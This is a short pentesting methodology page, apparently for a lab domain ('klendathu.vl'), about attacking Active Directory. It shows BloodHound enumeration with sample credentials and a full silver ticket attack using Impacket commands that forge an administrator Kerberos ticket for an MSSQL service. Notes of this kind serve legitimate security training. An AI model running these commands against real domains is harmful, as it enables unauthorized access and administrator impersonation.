Methodology

This Page shows the Complete methodology for Active Directory Pentesting

Bloodhound

We can use bloodhound to enumerate the domain if we have a valid set of credentials, we can use bloodhound.py kali linux script to do some enumeration

 bloodhound-python --dns-tcp -ns 10.10.179.143 -d klendathu.vl -u 'zim' -p 'football22' -c all

Silver Ticket Attack

In a silver ticket attack, the attacker can forge a valid TGS (Ticket granting Service) and then attacker can access that service using that TGS.

For this attack we need the NTLM hash of the service account user. for this we can use online tools, or below python code

# Below code will give NTLM Hash of test1234
import hashlib,binascii
hash = hashlib.new('md4', "test1234".encode('utf-16le')).digest();
print(binascii.hexlify(hash));

For Domain SID we can use

# Below command will print the Domain SID
impacket-lookupsid domain/username:password@10.10.231.85

now we have both NTLM hash and the Domain SID so we can craft the Silver Ticket Attack, for this i like to use Impacket-ticketer

impacket-ticketer -spn MSSQLSvc/srv1.klendathu.vl -domain klendathu.vl -domain-sid S-1-5-21-641890747-1618203462-755025521 -nthash E2F156A20FA3AC2B16768F8ADD53D72C administrator

this will create a administrator.ccache file

#export the ticker
export KRB5CCNAME=administrator.ccache

# then use this ticket to access any service like MSSQL

impacket-mssqlclient -k -no-pass <domain name or subdomain>

#e.g

impacket-mssqlclient -k -no-pass SRV1.Klendathu.vl

Previous5000 - Pentesting Docker Registry NextHydra

Last updated 4 months ago